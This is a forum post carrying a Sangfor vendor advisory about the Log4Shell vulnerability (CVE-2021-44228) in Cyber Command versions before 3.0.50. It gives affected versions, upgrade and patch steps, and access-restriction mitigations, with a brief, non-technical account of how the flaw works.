[CC] Apache Log4j2 Remote Code Execution

CTI SC Lv2Posted 29 Dec 2021 16:47

Last edited by CTI SC 29 Dec 2021 16:48.

Product warning background:
Vulnerability Overview
On 10 December 2021, Apache Log4j2 Remote Code Execution (RCE) vulnerability (CVE-2021-44228), also known as Log4Shell was announced. This vulnerability exists in some previous versions of Sangfor Cyber Command. Attackers can exploit the vulnerability to run remote code execution and gain total access to the Cyber Command server.  Sangfor has released a patch for this vulnerability

No other Sangfor Products including IAG, NGAF, Endpoint Secure, HCI, VDI, SSLVPN, WANO and CM are affected at this time.

Versions and Fix
The scope of the vulnerability is for Sangfor Cyber Command versions before v3.0.50. Version 3.0.50 and newer will not be affected. The vulnerability mentioned above can be mitigated by upgrading Cyber Command to v.3.0.50 or v3.0.59.  For customers who have "Allow Automatic Updates" enabled, Cyber Command will have automatically installed the update if online. For customers who do not have automatic updates enabled, Cyber Command needs to be updated manually by installing this patch.

Consequences
Attackers can use this vulnerability to execute arbitrary code on Cyber Command through RCE, potentially giving the attackers complete access to the server.

Vulnerability Introduction
The Apache log4j library used by Cyber Command allows for developers to log various data within their application. In certain circumstances, the data being logged originates from user input. Should this user input contain special characters and be logged using log4j, the Java method lookup will be called to execute the user-defined remote Java class in the LDAP server. This will in turn lead to RCE on Cyber Command.

Precautions & Measures
1. Upgrade Cyber Command to version 3.0.50 or later.
2. Enable automatic updates.
3. Please make sure that the Internet-facing console access permission of Cyber Command is turned off. If you need to perform remote operation and maintenance, you can use an SSL VPN or other methods to access the intranet first.
4. Set a whitelist restriction for the login IP address to Cyber Command, allowing access only to security operation and maintenance personnel.

Download the Current Version of Cyber Command
Download the following from the Sangfor Cyber Command Community Download page:https://community.sangfor.com/plugin.php?id=service:download&action=view&fid=92#/34/all

1. Upgrade file for Cyber Command version 3.0.49 and below
2. Latest patch file for Cyber Command
3. Full installation file for the latest version of Cyber Command
Source of vulnerabilityNational Vulnerability Database (NVD): CVE-2021-44228

Trending Topics

Board Leaders